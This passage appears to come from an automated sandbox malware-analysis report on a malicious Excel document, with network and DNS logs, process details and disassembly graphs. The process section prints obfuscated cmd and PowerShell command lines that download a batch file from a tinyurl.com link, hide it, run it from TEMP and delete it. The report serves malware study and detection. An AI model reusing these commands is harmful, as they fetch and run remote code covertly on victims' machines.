                                                              Nov 18, 2020 02:58:20.129618883 CET44349688104.20.139.65192.168.2.3
                                                              Nov 18, 2020 02:58:20.129789114 CET49688443192.168.2.3104.20.139.65
                                                              Nov 18, 2020 02:58:20.185489893 CET49688443192.168.2.3104.20.139.65
                                                              Nov 18, 2020 02:58:20.202076912 CET44349688104.20.139.65192.168.2.3
                                                              Nov 18, 2020 02:58:20.206444979 CET44349688104.20.139.65192.168.2.3
                                                              Nov 18, 2020 02:58:20.206480026 CET44349688104.20.139.65192.168.2.3
                                                              Nov 18, 2020 02:58:20.206509113 CET44349688104.20.139.65192.168.2.3
                                                              Nov 18, 2020 02:58:20.206602097 CET49688443192.168.2.3104.20.139.65
                                                              Nov 18, 2020 02:58:20.212810040 CET49688443192.168.2.3104.20.139.65
                                                              Nov 18, 2020 02:58:20.229248047 CET44349688104.20.139.65192.168.2.3
                                                              Nov 18, 2020 02:58:20.229420900 CET44349688104.20.139.65192.168.2.3
                                                              Nov 18, 2020 02:58:20.273979902 CET49688443192.168.2.3104.20.139.65
                                                              Nov 18, 2020 02:58:20.277529955 CET49688443192.168.2.3104.20.139.65
                                                              Nov 18, 2020 02:58:20.294032097 CET44349688104.20.139.65192.168.2.3
                                                              Nov 18, 2020 02:58:20.795969963 CET44349688104.20.139.65192.168.2.3
                                                              Nov 18, 2020 02:58:20.795991898 CET44349688104.20.139.65192.168.2.3
                                                              Nov 18, 2020 02:58:20.796000004 CET44349688104.20.139.65192.168.2.3
                                                              Nov 18, 2020 02:58:20.796008110 CET44349688104.20.139.65192.168.2.3
                                                              Nov 18, 2020 02:58:20.796199083 CET49688443192.168.2.3104.20.139.65
                                                              Nov 18, 2020 02:58:20.800072908 CET49688443192.168.2.3104.20.139.65
                                                              Nov 18, 2020 02:58:20.816525936 CET44349688104.20.139.65192.168.2.3
                                                              Nov 18, 2020 02:58:21.317920923 CET44349688104.20.139.65192.168.2.3
                                                              Nov 18, 2020 02:58:21.317967892 CET44349688104.20.139.65192.168.2.3
                                                              Nov 18, 2020 02:58:21.318005085 CET44349688104.20.139.65192.168.2.3
                                                              Nov 18, 2020 02:58:21.318031073 CET44349688104.20.139.65192.168.2.3
                                                              Nov 18, 2020 02:58:21.318065882 CET44349688104.20.139.65192.168.2.3
                                                              Nov 18, 2020 02:58:21.318104982 CET44349688104.20.139.65192.168.2.3
                                                              Nov 18, 2020 02:58:21.318106890 CET49688443192.168.2.3104.20.139.65
                                                              Nov 18, 2020 02:58:21.318149090 CET44349688104.20.139.65192.168.2.3
                                                              Nov 18, 2020 02:58:21.318160057 CET49688443192.168.2.3104.20.139.65
                                                              Nov 18, 2020 02:58:21.318175077 CET44349688104.20.139.65192.168.2.3
                                                              Nov 18, 2020 02:58:21.318209887 CET44349688104.20.139.65192.168.2.3
                                                              Nov 18, 2020 02:58:21.318222046 CET49688443192.168.2.3104.20.139.65
                                                              Nov 18, 2020 02:58:21.318238020 CET44349688104.20.139.65192.168.2.3
                                                              Nov 18, 2020 02:58:21.318284035 CET49688443192.168.2.3104.20.139.65
                                                              Nov 18, 2020 02:58:22.923556089 CET49688443192.168.2.3104.20.139.65

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 18, 2020 02:57:03.520025015 CET5190453192.168.2.38.8.8.8
                                                              Nov 18, 2020 02:57:03.557425022 CET53519048.8.8.8192.168.2.3
                                                              Nov 18, 2020 02:57:24.348707914 CET6132853192.168.2.38.8.8.8
                                                              Nov 18, 2020 02:57:24.375967026 CET53613288.8.8.8192.168.2.3
                                                              Nov 18, 2020 02:58:16.486804962 CET5413053192.168.2.38.8.8.8
                                                              Nov 18, 2020 02:58:16.524581909 CET53541308.8.8.8192.168.2.3
                                                              Nov 18, 2020 02:58:19.029185057 CET5696153192.168.2.38.8.8.8
                                                              Nov 18, 2020 02:58:19.065121889 CET53569618.8.8.8192.168.2.3
                                                              Nov 18, 2020 02:58:20.067867041 CET5935353192.168.2.38.8.8.8
                                                              Nov 18, 2020 02:58:20.103576899 CET53593538.8.8.8192.168.2.3
                                                              Nov 18, 2020 02:58:20.715697050 CET5223853192.168.2.38.8.8.8
                                                              Nov 18, 2020 02:58:20.743089914 CET53522388.8.8.8192.168.2.3
                                                              Nov 18, 2020 02:58:22.381047010 CET4987353192.168.2.38.8.8.8
                                                              Nov 18, 2020 02:58:22.416620016 CET53498738.8.8.8192.168.2.3
                                                              Nov 18, 2020 02:58:24.241022110 CET5319653192.168.2.38.8.8.8
                                                              Nov 18, 2020 02:58:24.276925087 CET53531968.8.8.8192.168.2.3
                                                              Nov 18, 2020 02:58:25.987683058 CET5677753192.168.2.38.8.8.8
                                                              Nov 18, 2020 02:58:26.015088081 CET53567778.8.8.8192.168.2.3
                                                              Nov 18, 2020 02:58:28.028150082 CET5864353192.168.2.38.8.8.8
                                                              Nov 18, 2020 02:58:28.068965912 CET53586438.8.8.8192.168.2.3
                                                              Nov 18, 2020 02:58:31.390539885 CET6098553192.168.2.38.8.8.8
                                                              Nov 18, 2020 02:58:31.426335096 CET53609858.8.8.8192.168.2.3
                                                              Nov 18, 2020 02:58:33.393949032 CET5020053192.168.2.38.8.8.8
                                                              Nov 18, 2020 02:58:33.429908037 CET53502008.8.8.8192.168.2.3
                                                              Nov 18, 2020 02:58:35.108163118 CET5128153192.168.2.38.8.8.8
                                                              Nov 18, 2020 02:58:35.135910988 CET53512818.8.8.8192.168.2.3
                                                              Nov 18, 2020 02:58:36.689135075 CET4919953192.168.2.38.8.8.8
                                                              Nov 18, 2020 02:58:36.724582911 CET53491998.8.8.8192.168.2.3
                                                              Nov 18, 2020 02:58:38.049671888 CET5062053192.168.2.38.8.8.8
                                                              Nov 18, 2020 02:58:38.085330009 CET53506208.8.8.8192.168.2.3
                                                              Nov 18, 2020 02:58:39.527400017 CET6493853192.168.2.38.8.8.8
                                                              Nov 18, 2020 02:58:39.563162088 CET53649388.8.8.8192.168.2.3
                                                              Nov 18, 2020 02:58:42.181350946 CET6015253192.168.2.38.8.8.8
                                                              Nov 18, 2020 02:58:42.217281103 CET53601528.8.8.8192.168.2.3
                                                              Nov 18, 2020 02:58:43.580136061 CET5754453192.168.2.38.8.8.8
                                                              Nov 18, 2020 02:58:43.615881920 CET53575448.8.8.8192.168.2.3
                                                              Nov 18, 2020 02:58:44.806583881 CET5598453192.168.2.38.8.8.8
                                                              Nov 18, 2020 02:58:44.842323065 CET53559848.8.8.8192.168.2.3
                                                              Nov 18, 2020 02:58:48.189169884 CET6418553192.168.2.38.8.8.8
                                                              Nov 18, 2020 02:58:48.224632978 CET53641858.8.8.8192.168.2.3
                                                              Nov 18, 2020 02:58:49.159327030 CET6511053192.168.2.38.8.8.8
                                                              Nov 18, 2020 02:58:49.186456919 CET53651108.8.8.8192.168.2.3
                                                              Nov 18, 2020 02:58:50.219301939 CET5836153192.168.2.38.8.8.8
                                                              Nov 18, 2020 02:58:50.246471882 CET53583618.8.8.8192.168.2.3
                                                              Nov 18, 2020 02:58:51.294568062 CET6349253192.168.2.38.8.8.8
                                                              Nov 18, 2020 02:58:51.324724913 CET53634928.8.8.8192.168.2.3

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                              Nov 18, 2020 02:58:20.067867041 CET192.168.2.38.8.8.80xa943Standard query (0)tinyurl.comA (IP address)IN (0x0001)

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                              Nov 18, 2020 02:58:20.103576899 CET8.8.8.8192.168.2.30xa943No error (0)tinyurl.com104.20.139.65A (IP address)IN (0x0001)
                                                              Nov 18, 2020 02:58:20.103576899 CET8.8.8.8192.168.2.30xa943No error (0)tinyurl.com172.67.1.225A (IP address)IN (0x0001)
                                                              Nov 18, 2020 02:58:20.103576899 CET8.8.8.8192.168.2.30xa943No error (0)tinyurl.com104.20.138.65A (IP address)IN (0x0001)

                                                              HTTPS Packets

                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                              Nov 18, 2020 02:58:20.206509113 CET104.20.139.65443192.168.2.349688CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Aug 03 02:00:00 CEST 2020 Mon Jan 27 13:46:39 CET 2020Tue Aug 03 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                              CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:46:39 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                              Code Manipulations

                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              Analysis Process: EXCEL.EXE PID: 5652 Parent PID: 792

                                                              General

                                                              Start time:02:56:43
                                                              Start date:18/11/2020
                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                              Imagebase:0xaf0000
                                                              File size:27110184 bytes
                                                              MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: cmd.exe PID: 5804 Parent PID: 5652

                                                              General

                                                              Start time:02:56:47
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
                                                              Imagebase:0xbd0000
                                                              File size:232960 bytes
                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: cmd.exe PID: 5764 Parent PID: 5652

                                                              General

                                                              Start time:02:56:47
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:cmd /c power^shell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
                                                              Imagebase:0xbd0000
                                                              File size:232960 bytes
                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: conhost.exe PID: 5780 Parent PID: 5804

                                                              General

                                                              Start time:02:56:47
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6b2800000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: cmd.exe PID: 5860 Parent PID: 5652

                                                              General

                                                              Start time:02:56:47
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:cmd /c power^shell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
                                                              Imagebase:0xbd0000
                                                              File size:232960 bytes
                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: conhost.exe PID: 5848 Parent PID: 5764

                                                              General

                                                              Start time:02:56:47
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6b2800000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: powershell.exe PID: 800 Parent PID: 5804

                                                              General

                                                              Start time:02:56:48
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
                                                              Imagebase:0xfd0000
                                                              File size:430592 bytes
                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: cmd.exe PID: 2992 Parent PID: 5652

                                                              General

                                                              Start time:02:56:48
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:cmd /c power^shell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
                                                              Imagebase:0xbd0000
                                                              File size:232960 bytes
                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: conhost.exe PID: 3060 Parent PID: 5860

                                                              General

                                                              Start time:02:56:48
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6b2800000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: powershell.exe PID: 1720 Parent PID: 5764

                                                              General

                                                              Start time:02:56:48
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
                                                              Imagebase:0xfd0000
                                                              File size:430592 bytes
                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: cmd.exe PID: 4972 Parent PID: 5652

                                                              General

                                                              Start time:02:56:48
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')
                                                              Imagebase:0xbd0000
                                                              File size:232960 bytes
                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: conhost.exe PID: 4228 Parent PID: 2992

                                                              General

                                                              Start time:02:56:48
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6b2800000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: powershell.exe PID: 912 Parent PID: 5860

                                                              General

                                                              Start time:02:56:49
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
                                                              Imagebase:0xfd0000
                                                              File size:430592 bytes
                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: conhost.exe PID: 1564 Parent PID: 4972

                                                              General

                                                              Start time:02:56:49
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6b2800000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: powershell.exe PID: 4824 Parent PID: 2992

                                                              General

                                                              Start time:02:56:49
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
                                                              Imagebase:0xfd0000
                                                              File size:430592 bytes
                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: powershell.exe PID: 5344 Parent PID: 4972

                                                              General

                                                              Start time:02:56:50
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')
                                                              Imagebase:0xfd0000
                                                              File size:430592 bytes
                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: attrib.exe PID: 5400 Parent PID: 912

                                                              General

                                                              Start time:02:58:15
                                                              Start date:18/11/2020
                                                              Path:C:\Windows\SysWOW64\attrib.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Windows\system32\attrib.exe' +s +h pd.bat
                                                              Imagebase:0xdf0000
                                                              File size:19456 bytes
                                                              MD5 hash:A5540E9F87D4CB083BDF8269DEC1CFF9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language

                                                              Chronological Activities

                                                              Disassembly

                                                              Code Analysis

                                                              Reset < >

                                                                Analysis Process: powershell.exe PID: 1720 Parent PID: 5764 powershell.exeCOMMON

                                                                Execution Graph

                                                                Execution Coverage:7.3%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:4.2%
                                                                Total number of Nodes:72
                                                                Total number of Limit Nodes:4

                                                                Graph

                                                                execution_graph 23574 307a6e7 23575 307a717 23574->23575 23576 307a9f7 23575->23576 23579 307af71 23575->23579 23582 307af80 GetPointerCursorId 23575->23582 23580 307af80 GetPointerCursorId 23579->23580 23581 307afb0 23580->23581 23581->23576 23583 307afb0 23582->23583 23583->23576 23584 31d4e74 23585 31d4b8e 23584->23585 23585->23584 23586 31d4e8d 23585->23586 23588 31d45d1 23585->23588 23589 31d4583 23588->23589 23590 31d45da 23588->23590 23591 31d45ad 23589->23591 23593 31d58ba 23589->23593 23590->23585 23591->23585 23594 31d58c3 23593->23594 23599 31d636e 23593->23599 23604 31d62b0 23593->23604 23609 31d6271 23593->23609 23614 31d6354 23593->23614 23594->23591 23600 31d6384 23599->23600 23601 31d63a1 23600->23601 23619 31d7fb0 23600->23619 23624 31d7fc0 23600->23624 23605 31d62cb 23604->23605 23606 31d63a1 23605->23606 23607 31d7fb0 RtlEncodePointer 23605->23607 23608 31d7fc0 RtlEncodePointer 23605->23608 23607->23606 23608->23606 23610 31d627d 23609->23610 23611 31d63a1 23610->23611 23612 31d7fb0 RtlEncodePointer 23610->23612 23613 31d7fc0 RtlEncodePointer 23610->23613 23612->23611 23613->23611 23615 31d6307 23614->23615 23615->23614 23616 31d63a1 23615->23616 23617 31d7fb0 RtlEncodePointer 23615->23617 23618 31d7fc0 RtlEncodePointer 23615->23618 23617->23616 23618->23616 23620 31d7fc0 23619->23620 23629 31d86f0 23620->23629 23633 31d86e2 23620->23633 23621 31d7fed 23621->23601 23625 31d7fcf 23624->23625 23627 31d86f0 RtlEncodePointer 23625->23627 23628 31d86e2 RtlEncodePointer 23625->23628 23626 31d7fed 23626->23601 23627->23626 23628->23626 23631 31d86f9 23629->23631 23630 31d872a 23630->23621 23631->23630 23637 31d5f54 23631->23637 23635 31d86f0 23633->23635 23634 31d872a 23634->23621 23635->23634 23636 31d5f54 RtlEncodePointer 23635->23636 23636->23634 23638 31d9720 RtlEncodePointer 23637->23638 23640 31d978e 23638->23640 23640->23630 23641 31d3320 23642 31d3328 23641->23642 23643 31d34ec 23642->23643 23646 31d2c18 23642->23646 23651 31d2c28 23642->23651 23647 31d2c28 23646->23647 23648 31d2c64 23647->23648 23656 31d2ab0 23647->23656 23660 31d2aa0 23647->23660 23648->23642 23652 31d2c60 23651->23652 23653 31d2c64 23652->23653 23654 31d2ab0 DrawStateW 23652->23654 23655 31d2aa0 DrawStateW 23652->23655 23653->23642 23654->23653 23655->23653 23657 31d2aeb 23656->23657 23658 31d2aef 23657->23658 23659 31d2afa DrawStateW 23657->23659 23658->23648 23659->23648 23661 31d2ab0 23660->23661 23662 31d2aef 23661->23662 23663 31d2afa DrawStateW 23661->23663 23662->23648 23663->23648

                                                                Executed Functions

                                                                Function 0307D0C0, Relevance: .8, Instructions: 833COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 258 307d0c0-307d0f2 260 307d471-307d4d0 258->260 261 307d0f8-307d12c 258->261 482 307d4d3 call 307d867 260->482 483 307d4d3 call 307d7d3 260->483 484 307d4d3 call 307d0b0 260->484 485 307d4d3 call 307d0c0 260->485 264 307d133-307d178 261->264 282 307d17e-307d185 264->282 283 307d22a-307d22e 264->283 270 307d4d9-307d4f6 274 307da21-307da28 270->274 275 307d4fc-307d505 270->275 277 307dbd4-307dc0a 275->277 278 307d50b-307d529 275->278 299 307dc0f-307dc21 277->299 294 307d541-307d550 278->294 295 307d52b-307d53b 278->295 284 307d187-307d19c 282->284 285 307d1a4-307d1e3 282->285 286 307d234-307d23b 283->286 287 307d37e-307d382 283->287 284->285 305 307d1e5-307d210 285->305 306 307d212-307d228 285->306 292 307d23d-307d252 286->292 293 307d25a-307d2ab 286->293 290 307d446-307d44d 287->290 291 307d388-307d38f 287->291 296 307d391-307d3a6 291->296 297 307d3ae-307d3ff 291->297 292->293 309 307d2b1-307d301 293->309 310 307d35d-307d37c 293->310 307 307d556-307d562 294->307 308 307da0f-307da1b 294->308 295->294 295->308 296->297 318 307d401-307d42c 297->318 319 307d42e-307d443 297->319 321 307dc23-307dc2f 299->321 322 307dc31-307dd04 299->322 305->306 306->283 331 307d564-307d566 307->331 332 307d568-307d579 307->332 308->274 308->275 333 307d303-307d32e 309->333 334 307d330-307d357 309->334 310->287 318->319 319->290 321->322 337 307d57f-307d581 331->337 332->337 333->334 334->309 334->310 343 307d587-307d592 337->343 344 307d86b-307d877 337->344 343->344 353 307d598-307d5b2 343->353 350 307d87d-307d88e 344->350 351 307d879-307d87b 344->351 355 307d894-307d896 350->355 351->355 353->308 361 307d5b8-307d5c5 353->361 355->308 357 307d89c-307d8a7 355->357 357->308 362 307d8ad-307d8c7 357->362 365 307d5c7-307d5d4 361->365 366 307d5d6 361->366 362->308 369 307d8cd-307d8d2 362->369 368 307d5db-307d5dd 365->368 366->368 368->308 370 307d5e3-307d5e9 368->370 371 307d8d4-307d8de 369->371 372 307d8e0 369->372 373 307d602-307d650 370->373 374 307d5eb-307d5fc 370->374 375 307d8e5-307d8e7 371->375 372->375 397 307d682-307d6a5 373->397 398 307d652-307d67b 373->398 374->373 381 307da2b-307da6a 374->381 375->308 376 307d8ed-307d8f3 375->376 379 307d8f5-307d905 376->379 380 307d90b-307d949 376->380 379->380 387 307dafb-307db40 379->387 406 307d956-307d95c 380->406 407 307d94b-307d94e 380->407 400 307da81-307daf4 381->400 401 307da6c-307da76 381->401 414 307db57-307dbcd 387->414 415 307db42-307db4c 387->415 416 307d7e7-307d810 397->416 417 307d6ab-307d6b1 397->417 398->397 400->387 401->400 411 307d98e-307d9c9 406->411 412 307d95e-307d987 406->412 407->406 411->308 441 307d9cb-307da04 411->441 412->411 414->277 415->414 416->308 437 307d816-307d85a 416->437 421 307d6e3-307d720 417->421 422 307d6b3-307d6dc 417->422 456 307d726-307d785 421->456 457 307d7ac-307d7c5 421->457 422->421 437->308 441->308 478 307d787-307d78a 456->478 479 307d792-307d7a6 456->479 465 307d7c7 457->465 466 307d7d0 457->466 465->466 466->416 478->479 479->456 479->457 482->270 483->270 484->270 485->270
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.452136572.0000000003070000.00000040.00000001.sdmp, Offset: 03070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 271ab56c608b5dc87d19cb1ada3fb8d03ee75856bd1cfaec31bca1ce6d8bd555
                                                                • Instruction ID: f644c29e428969fee793b350f79fe5dfe979792746e079366ca3b6611eda5e62
                                                                • Opcode Fuzzy Hash: 271ab56c608b5dc87d19cb1ada3fb8d03ee75856bd1cfaec31bca1ce6d8bd555
                                                                • Instruction Fuzzy Hash: B5628D34A01609DFCB14DF69D850AAEB7F2FF88304F188969E505AB360DB70ED46CB95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 031D0040, Relevance: .6, Instructions: 626COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 486 31d0040-31d006f 487 31d0085-31d0088 486->487 488 31d0071-31d007e 486->488 489 31d009e-31d00a1 487->489 490 31d008a-31d0097 487->490 488->487 494 31d0080 488->494 492 31d00b7-31d00d5 489->492 493 31d00a3-31d00b0 489->493 490->489 499 31d0099 490->499 502 31d00db-31d00df 492->502 503 31d0a97-31d0b2b 492->503 493->492 500 31d00b2 493->500 497 31d0a8d-31d0a94 494->497 499->497 500->497 504 31d00e1-31d00f0 502->504 505 31d00f3-31d0100 502->505 653 31d0b30 call 31d068c 503->653 654 31d0b30 call 31d0006 503->654 655 31d0b30 call 31d0040 503->655 504->505 506 31d0108 505->506 507 31d0102-31d0106 505->507 510 31d010a-31d0125 506->510 507->510 513 31d012c-31d0130 510->513 514 31d0127 510->514 516 31d0150-31d017f 513->516 517 31d0132-31d014d 513->517 514->497 524 31d0199-31d019f 516->524 525 31d0181-31d0192 516->525 517->516 518 31d0b36-31d0b3d 526 31d01ba-31d01c3 524->526 527 31d01a1-31d01b3 524->527 525->524 528 31d01c5-31d01d9 526->528 529 31d01e0-31d026e 526->529 527->526 528->529 533 31d0270-31d0293 529->533 534 31d02d3-31d02e0 529->534 537 31d029c-31d02a3 533->537 538 31d0295-31d029a 533->538 535 31d0347-31d036a 534->535 536 31d02e2-31d0301 534->536 543 31d036c-31d0375 535->543 544 31d0381-31d0388 535->544 551 31d031c-31d0327 536->551 552 31d0303-31d031a 536->552 539 31d02a6-31d02a8 537->539 538->539 539->534 540 31d02aa-31d02cf 539->540 540->534 543->544 547 31d03cb-31d03d1 544->547 548 31d038a 544->548 549 31d0637-31d0654 547->549 550 31d03d7-31d041d 547->550 548->547 553 31d039e-31d03c3 548->553 554 31d0391-31d039c 548->554 565 31d068e-31d06cf 549->565 566 31d0656-31d0677 549->566 572 31d055f-31d0563 550->572 573 31d0423-31d043c 550->573 560 31d0329-31d0345 551->560 552->560 553->547 554->547 560->535 575 31d06d5-31d06d9 565->575 566->575 574 31d0569-31d0585 572->574 572->575 587 31d043e-31d0450 573->587 588 31d04b7-31d04ca 573->588 592 31d05bd-31d05d0 574->592 593 31d0587-31d058c 574->593 576 31d06fb-31d0872 575->576 577 31d06db-31d06df 575->577 649 31d0877-31d08cf 576->649 582 31d06eb-31d06f4 577->582 583 31d06e1 577->583 582->576 583->582 600 31d051e-31d0555 587->600 601 31d0456-31d045a 587->601 591 31d055c 588->591 591->572 598 31d0634 592->598 596 